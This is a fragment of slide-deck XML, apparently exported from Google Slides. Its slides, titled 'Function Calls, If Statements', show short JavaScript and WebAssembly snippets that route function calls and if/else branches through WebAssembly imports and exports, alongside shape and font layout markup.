                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="Google Shape;687;p60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="30669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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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688" name="Google Shape;688;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="4670144" cy="131187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689" name="Google Shape;689;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="1435853"/>
            <a:ext cx="4846320" cy="2194560"/>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4" name="Google Shape;694;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61"/>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Function Calls, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="Google Shape;700;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="30669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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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701" name="Google Shape;701;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="4670144" cy="131187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702" name="Google Shape;702;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164"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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="1435853"/>
            <a:ext cx="4846320" cy="2194560"/>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07" name="Google Shape;707;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="822960"/>
            <a:ext cx="3675887" cy="423192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param</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383A42"/>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"elseImport"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$t1</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local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="A0A1A7"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;; label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end</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Google Shape;708;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1168542"/>
            <a:ext cx="3383280" cy="171986"/>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09" name="Google Shape;709;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1506877"/>
            <a:ext cx="3383280" cy="339677"/>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0" name="Google Shape;710;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="2174455"/>
            <a:ext cx="3383280" cy="1181304"/>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1" name="Google Shape;711;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1520476"/>
            <a:ext cx="3383280" cy="310896"/>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2" name="Google Shape;712;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708"/>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709"/>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7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62"/>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Function Calls, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Google Shape;718;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="30669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if</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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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719" name="Google Shape;719;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2120876"/>
            <a:ext cx="4670144" cy="131187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720" name="Google Shape;720;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="158785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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="175479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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425"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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164" y="193799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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="1435853"/>
            <a:ext cx="4846320" cy="2194560"/>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5" name="Google Shape;725;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="822960"/>
            <a:ext cx="3675887" cy="423192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param</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383A42"/>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"elseImport"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$t1</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local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="A0A1A7"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;; label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end</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="726" name="Google Shape;726;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1168542"/>
            <a:ext cx="3383280" cy="171986"/>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7" name="Google Shape;727;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1506877"/>
            <a:ext cx="3383280" cy="339677"/>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8" name="Google Shape;728;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="2174455"/>
            <a:ext cx="3383280" cy="1181304"/>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9" name="Google Shape;729;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5585016" y="2185661"/>
            <a:ext cx="3305012" cy="1152144"/>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30" name="Google Shape;730;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-9591354">
            <a:off x="5420368" y="1167462"/>
            <a:ext cx="1232018" cy="1660722"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 1315455"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>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31" name="Google Shape;731;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-9591354">
            <a:off x="5459879" y="1276870"/>
            <a:ext cx="1232018" cy="1904387"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 1315455"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>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32" name="Google Shape;732;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63"/>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Function Calls, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738" name="Google Shape;738;p63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="4229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 =&gt;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_ifInstance0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WebAssembly.Instance(_ifWasmModule,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ifImp: () =&gt; {</a:t>
            </a:r>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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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elseImp: () =&gt;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_ifInstance0.exports;</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_exports.if_func(x33 ? 1 : 0);</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739" name="Google Shape;739;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2450656"/>
            <a:ext cx="4670144" cy="131187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740" name="Google Shape;740;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="191763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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="208457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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425" y="226777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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164" y="226777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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="1435852"/>
            <a:ext cx="4846320" cy="3346009"/>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45" name="Google Shape;745;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="822960"/>
            <a:ext cx="3675887" cy="423192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param</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383A42"/>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"elseImport"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$t1</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local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="A0A1A7"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;; label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end</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Google Shape;746;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1168542"/>
            <a:ext cx="3383280" cy="171986"/>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47" name="Google Shape;747;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1506877"/>
            <a:ext cx="3383280" cy="339677"/>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48" name="Google Shape;748;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="2174455"/>
            <a:ext cx="3383280" cy="1181304"/>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49" name="Google Shape;749;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64"/>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Function Calls, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="755" name="Google Shape;755;p64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134149" y="822960"/>
            <a:ext cx="8778240" cy="4229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 =&gt;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_ifInstance0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WebAssembly.Instance(_ifWasmModule,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ifImp: () =&gt; {</a:t>
            </a:r>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 =&gt;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_callInstance0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WebAssembly.Instance(_callWasmModule,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callImport: () =&gt;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.body.appendChild(x22);}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_callInstance0.exports;</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_exports.call_func();</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elseImp: () =&gt;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_ifInstance0.exports;</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_exports.if_func(x33 ? 1 : 0);</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756" name="Google Shape;756;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463987" y="2450656"/>
            <a:ext cx="4670144" cy="131187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757" name="Google Shape;757;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2820566" y="191763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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272679" y="208457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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3445425" y="226777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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628164" y="226777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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="337035" y="1435852"/>
            <a:ext cx="4846320" cy="3346009"/>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2" name="Google Shape;762;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="822960"/>
            <a:ext cx="3675887" cy="423192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param</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383A42"/>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"elseImport"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$t1</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local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="986801"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="383A42"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="A0A1A7"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;; label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end</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763" name="Google Shape;763;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1168542"/>
            <a:ext cx="3383280" cy="171986"/>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4" name="Google Shape;764;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="1506877"/>
            <a:ext cx="3383280" cy="339677"/>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5" name="Google Shape;765;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5545882" y="2174455"/>
            <a:ext cx="3383280" cy="1181304"/>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6" name="Google Shape;766;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1590794"/>
            <a:ext cx="4572000" cy="189011"/>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7" name="Google Shape;767;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rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7104156" y="1981048"/>
            <a:ext cx="1368300" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6062220" y="2666844"/>
            <a:ext cx="914400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2233606" y="2666845"/>
            <a:ext cx="1097280" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225487" y="1628866"/>
            <a:ext cx="1105399" cy="598449"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2267801" y="3106376"/>
            <a:ext cx="1063085" cy="568706"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1097552" y="2227315"/>
            <a:ext cx="914400" cy="1125417"/>
            <a:chOff x="4889487" y="2999081"/>
            <a:chExt cx="914400" cy="1125417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="167" name="Google Shape;167;p29"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4889487" y="2999081"/>
              <a:ext cx="914400" cy="1125417"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="168" name="Google Shape;168;p29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4944415" y="3377411"/>
              <a:ext cx="81945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accent1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
